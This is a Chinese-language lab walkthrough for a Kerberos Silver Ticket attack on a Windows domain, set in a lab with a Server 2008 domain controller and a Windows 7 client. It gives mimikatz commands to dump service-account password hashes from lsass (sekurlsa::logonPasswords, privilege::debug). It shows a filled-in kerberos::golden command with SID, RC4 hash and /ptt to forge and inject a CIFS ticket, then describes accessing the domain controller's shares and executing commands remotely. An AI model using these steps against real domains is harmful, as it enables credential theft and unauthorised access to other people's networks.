0x01 实验准备
实验工具:
-
PsExec64工具是内网渗透中的免杀渗透利器。
-
mimikatz_trunk 工具的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码,还可以提升进程权限、注入进程、读取进程内存等等。
实验环境:
- Windows server 2008 作为域控制器,域为 yuming.com
- Windows 7 作为 yuming域下的一台设备
0x02 白银票据条件
- 域名称
- 域的SID值
- 域的服务账号的密码HASH
- 伪造的用户名,可以是任意用户名,一般是伪造administrator
- 需要访问的服务
0x03 实验步骤
一、获取service账户的hash值
在域控制器上操作:
通过 mimikatz 输入命令来获取Network Server下服务账户哈希值:sekurlsa::logonPasswords
也可以通过wce、gethashes等方式获取。
若出现错误,执行此命令后再获取 HASH值:privilege::debug
二、伪造票据
在 yuming域下的设备(Windows 7)上操作:
得到服务账号的 HASH 之后使用mimikatz中的 kerberos::golden功能生成白银票据TGS ticket。
参数说明:
/domain:当前域名称
/sid:SID 值,域的SID
/target:目标主机
/rc4:目标主机的 HASH值
/server:需要获取权限的服务
/user:伪造的用户名
/ptt:表示的是Pass The Ticket 攻击,是把生成的票据导入内存,也可以使用 /ticket 导出之后再使用 kerberos::ptt 导入。
常见的service:
这里的service使用的是 cifs 服务:
kerberos::golden /domain:test.com /sid:S-1-5-21-593020204-2933201490-533286667 /target:计算机名称.test.com /rc4:68d728ba8b578294832fb6247c912f94 /service:cifs /user:administrator /ptt
3. 获取权限
在 yuming域下的设备(Windows 7)上操作:
清空本地票据缓存,导入伪造的票据(如果用的/ptt参数就跳过这一步,只需要清理本地缓存)
查看本地保存的票据:kerberos::list
清理本地票据缓存:kerberos::purge
导入伪造的白银票据:kerberos::ptt silver.kiribi
(步骤2使用了 /ptt ,所以此步忽略)
查看tgt票据(只能看到存在的黄金票据):kerberos::tgt
票据20分钟内有效,过期之后可以再次导入
4. 利用伪造的白银票据
在 yuming域下的设备(Windows 7)上操作:
-
访问域控的共享目录
-
远程登录,执行命令